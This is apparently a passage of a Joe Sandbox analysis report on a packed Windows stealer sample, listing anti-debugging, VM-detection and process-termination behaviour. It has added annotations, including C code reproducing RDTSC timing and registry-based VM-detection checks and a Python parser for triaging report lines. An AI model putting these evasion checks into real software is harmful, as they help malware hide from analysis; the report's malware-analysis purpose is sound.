              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703E0 second address: 54703E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98AE62 second address: 98AE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98AE66 second address: 98AEA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3BAC7E5E0Dh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F3BAC7E5E0Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98AEA1 second address: 98AEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
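The interceptor hits listed above are one check repeated at many addresses: the sample reads the timestamp counter, executes a few junk instructions between the reads (push/pop pairs, pushad/popad, unconditional jmps and conditional jumps that never fire), and reads it again. On bare metal the two reads are a few dozen cycles apart; when each RDTSC is trapped, emulated or single-stepped the delta grows by orders of magnitude, which is what the packer is measuring. The program below is an added example that reproduces that check in C; it is not code from the report or from the sample. The filler loop stands in for the sample's junk sequence, the non-x86 fallback is there only so the file builds everywhere, and the 1000-cycle threshold is an assumption, since the sample's real cut-off is not visible in the report.

```c
/* Added example (not from the Joe Sandbox report or the sample): the
 * two-reads-of-RDTSC timing check behind the "RDTSC instruction interceptor"
 * lines. Assumed threshold; the sample's own cut-off is unknown. */
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline uint64_t read_tsc(void) { return __rdtsc(); }
#else
/* Assumption: non-x86 build host. A nanosecond clock stands in for the TSC so
 * the example still compiles; the numbers are then not cycle counts. */
#include <time.h>
static inline uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}
#endif

/* One check: two timestamp reads with only cheap filler between them, which is
 * the "first address / second address" pair the sandbox reports. */
uint64_t rdtsc_delta(void) {
    uint64_t t0 = read_tsc();
    /* Filler standing in for the sample's push/pop/jmp junk. The compiler
     * barrier keeps the second read from being hoisted above it. */
    volatile uint32_t sink = 0;
    for (int i = 0; i < 8; i++) sink += (uint32_t)i;
    __asm__ __volatile__("" ::: "memory");
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Smallest delta over n samples. A single reading can be inflated by an
 * interrupt or a context switch; the minimum is what a careful packer compares. */
uint64_t rdtsc_min_delta(int n) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < n; i++) {
        uint64_t d = rdtsc_delta();
        if (d < best) best = d;
    }
    return best;
}

/* The decision: treat the host as instrumented when the delta exceeds the
 * threshold. Returns 1 for "instrumented", 0 for "looks like bare metal". */
int looks_instrumented(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

int main(void) {
    uint64_t d = rdtsc_min_delta(64);
    printf("min RDTSC delta over 64 samples: %llu\n", (unsigned long long)d);
    printf("%s\n", looks_instrumented(d, 1000) ? "looks instrumented"
                                               : "looks like bare metal");
    return 0;
}
```

Joe Sandbox logs each read pair precisely because it intercepts RDTSC; an analysis VM that instead lets the instruction execute natively (hardware virtualization with TSC offsetting) or patches the comparison after the second read will pass this check. Taking the minimum over many samples, as `rdtsc_min_delta` does, is why a spoofed counter has to be consistently low rather than occasionally low.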
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 97E767 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7DD3CE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 98FBCD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A05D9B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
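The three values queried above are well-known hypervisor fingerprints: {4d36e968-e325-11ce-bfc1-08002be10318} is the display-adapter device class, so its DriverDesc names the video driver, and SystemBiosVersion and VideoBiosVersion on a stock VirtualBox or VMware guest carry the vendor name. The C below is an added example of the string test such a check reduces to once the values have been read; it is not code from the sample or from the report, the marker list and the sample values are constructed here, and the sample's own marker list is not visible in the report.

```c
/* Added example (not from the Joe Sandbox report or the sample): the
 * substring test behind a registry-based VM check. Marker list and the
 * values in the test are assumptions, not values taken from the report. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Vendor strings that show up in these values on unhardened guests. */
static const char *const VM_MARKERS[] = {
    "VBOX", "VIRTUALBOX", "VMWARE", "QEMU", "BOCHS", "HYPER-V", "VIRTUAL", NULL
};

/* Case-insensitive substring search: the values mix cases
 * ("VBOX   - 1", "VirtualBox Graphics Adapter"). */
static int contains_nocase(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               toupper((unsigned char)hay[i]) == toupper((unsigned char)needle[i]))
            i++;
        if (i == n) return 1;
    }
    return 0;
}

/* Returns the first marker found in value, or NULL when none matches. */
const char *vm_marker_in(const char *value) {
    if (!value) return NULL;
    for (int i = 0; VM_MARKERS[i]; i++)
        if (contains_nocase(value, VM_MARKERS[i])) return VM_MARKERS[i];
    return NULL;
}

/* The three values the sample reads. On Windows they come from RegQueryValueEx
 * on the keys named in the report; here they are plain strings so the logic
 * can be exercised off-box. */
typedef struct {
    const char *driver_desc;         /* ...\Class\{4d36e968-...}\0000 : DriverDesc */
    const char *system_bios_version; /* HARDWARE\DESCRIPTION\System : SystemBiosVersion */
    const char *video_bios_version;  /* HARDWARE\DESCRIPTION\System : VideoBiosVersion */
} hw_desc_t;

/* 1 when any of the three values carries a hypervisor marker, else 0. */
int looks_like_vm(const hw_desc_t *h) {
    return vm_marker_in(h->driver_desc) != NULL ||
           vm_marker_in(h->system_bios_version) != NULL ||
           vm_marker_in(h->video_bios_version) != NULL;
}
```

Sandbox hardening scripts rewrite exactly these values, which is why the report treats the queries as a sandbox check rather than as proof of evasion; whether the sample then took the evasive branch is a separate finding (the "Evaded block" line further down).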
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-30012
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-28822
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.5 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AE330 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005AE330
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A1C40 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005A1C40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A3CC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A3CC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ACCE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005ACCE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059DD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0059DD70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A15C0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A15C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005915B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005915B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005915A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005915A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005ADE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_005ADE50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005AD640 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005AD640
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A4EC0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A4EC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005A2749
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A2730 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_005A2730
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B3190 GetSystemInfo,wsprintfA,0_2_005B3190
Source: file.exe, file.exe, 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1716207781.0000000001634000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1716207781.0000000001664000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-28692)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00594980 VirtualProtect 00000000,00000004,00000100,?0_2_00594980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005B63C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B63C0 mov eax, dword ptr fs:[00000030h]0_2_005B63C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005B29E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 1136, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B4630 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_005B4630
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B46C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_005B46C0
Source: file.exe, file.exe, 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: pHw2Program Manager
Source: file.exe, 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: opHw2Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_005B2D00
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B2B00 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_005B2B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005B29E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B2BB0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_005B2BB0
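The "Code function" lines in this section and the ones before it are the API call chains Joe Sandbox recovered per function. Read together they show directory walks that end in CopyFileA/DeleteFileA, a Toolhelp32 process walk that ends in TerminateProcess, PEB access through fs:[30h], GetProcAddress/LoadLibraryA import resolution and the user/locale/time queries a stealer uses to fingerprint the host. The SICE/NTICE/SIWVID device names and the regmon/filemon/procmon window classes checked above are generic protector-stage anti-analysis (the Oreans.vxd and WinLicense strings in the memory dump point to the wrapper), so they say little about the payload itself. The Python below is an added example and is not part of the report or of Joe Sandbox: it parses lines in the report's own "Code function" format into (function id, API sequence) and tags each function with the behaviour its chain implies, so a long report can be triaged by function rather than by line. The sample lines are copied from this report (the GetProcAddress chain abridged); the tag names and the thresholds are the example's own.

```python
"""Added example (not part of the Joe Sandbox report): parse 'Code function'
signature lines into (function id, API sequence) and tag behaviour per function."""
import re
from collections import defaultdict

FN_ID = re.compile(r"\b\d+_\d+_[0-9A-Fa-f]{8}\b")   # e.g. 0_2_005B46C0
IDENT = re.compile(r"^[A-Za-z_]\w*")                # leading API name of a token
HOST_INFO_APIS = {"GetUserNameA", "GetLocalTime", "GetTimeZoneInformation",
                  "GetSystemInfo", "GetKeyboardLayoutList", "GetLocaleInfoA"}

# Constructed sample: lines copied from the report above (one chain abridged).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005ADE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_005ADE50",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005A2749",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00594980 VirtualProtect 00000000,00000004,00000100,?0_2_00594980",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,0_2_005B63C0",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B63C0 mov eax, dword ptr fs:[00000030h]0_2_005B63C0",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B4630 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_005B4630",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B46C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_005B46C0",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_005B2D00",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005B29E0",
]


def parse_code_function(line: str):
    """Return (function id or None, [API names], remaining body) or None if the
    line is not a 'Code function' signature. The id may appear at the start,
    at the end, or both; the body may be a disassembly fragment instead of APIs."""
    _, sep, body = line.partition("Code function:")
    if not sep:
        return None
    ids = FN_ID.findall(body)
    body = FN_ID.sub("", body).strip()
    if "fs:[00000030h]" in body:            # instruction, not a call list
        return (ids[0] if ids else None), [], body
    apis = []
    for tok in body.split(","):             # 'VirtualProtect 00000000' -> 'VirtualProtect'
        m = IDENT.match(tok.strip())
        if m:
            apis.append(m.group())
    return (ids[0] if ids else None), apis, body


def classify(apis: list, body: str) -> list:
    """Behaviour tags implied by one call chain (tag names are the example's own)."""
    s, tags = set(apis), []
    if "fs:[00000030h]" in body:
        tags.append("PEB_ACCESS")
    if {"FindFirstFileA", "FindNextFileA"} <= s and s & {"CopyFileA", "DeleteFileA"}:
        tags.append("FILE_COLLECTION")       # walk a directory, copy/delete entries
    elif "FindFirstFileA" in s:
        tags.append("DIR_ENUM")
    if {"CreateToolhelp32Snapshot", "Process32First"} <= s:
        tags.append("PROCESS_KILL" if "TerminateProcess" in s else "PROCESS_ENUM")
    if apis.count("GetProcAddress") >= 3 or "LoadLibraryA" in s:
        tags.append("DYNAMIC_API_RESOLUTION")
    if "VirtualProtect" in s:
        tags.append("MEM_PROTECT_CHANGE")
    if s & HOST_INFO_APIS:
        tags.append("HOST_FINGERPRINT")
    return tags


def triage(lines) -> dict:
    """Merge all lines per function id into {id: {'apis': [...], 'tags': set()}}."""
    funcs = defaultdict(lambda: {"apis": [], "tags": set()})
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue
        fn_id, apis, body = parsed
        entry = funcs[fn_id or "unknown"]
        entry["apis"].extend(apis)
        entry["tags"].update(classify(apis, body))
    return dict(funcs)


def by_tag(funcs: dict) -> dict:
    """Invert the triage result: {tag: sorted function ids}."""
    out = defaultdict(list)
    for fn_id, info in funcs.items():
        for tag in info["tags"]:
            out[tag].append(fn_id)
    return {tag: sorted(ids) for tag, ids in out.items()}


if __name__ == "__main__":
    for tag, ids in sorted(by_tag(triage(SAMPLE_LINES)).items()):
        print(f"{tag:24s} {', '.join(ids)}")
```

Running the block over the sample lines groups the two 0_2_005B63C0 lines into one function tagged both DYNAMIC_API_RESOLUTION and PEB_ACCESS, and separates the read-only process walk (0_2_005B4630) from the one that terminates a matching process (0_2_005B46C0); the same loop can be pointed at a full report export.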

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1656030162.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1136, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1656030162.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1136, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix

A count in parentheses is the number of report signatures mapped to that technique; entries without a count are the matrix's standard cells with no match for this sample.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
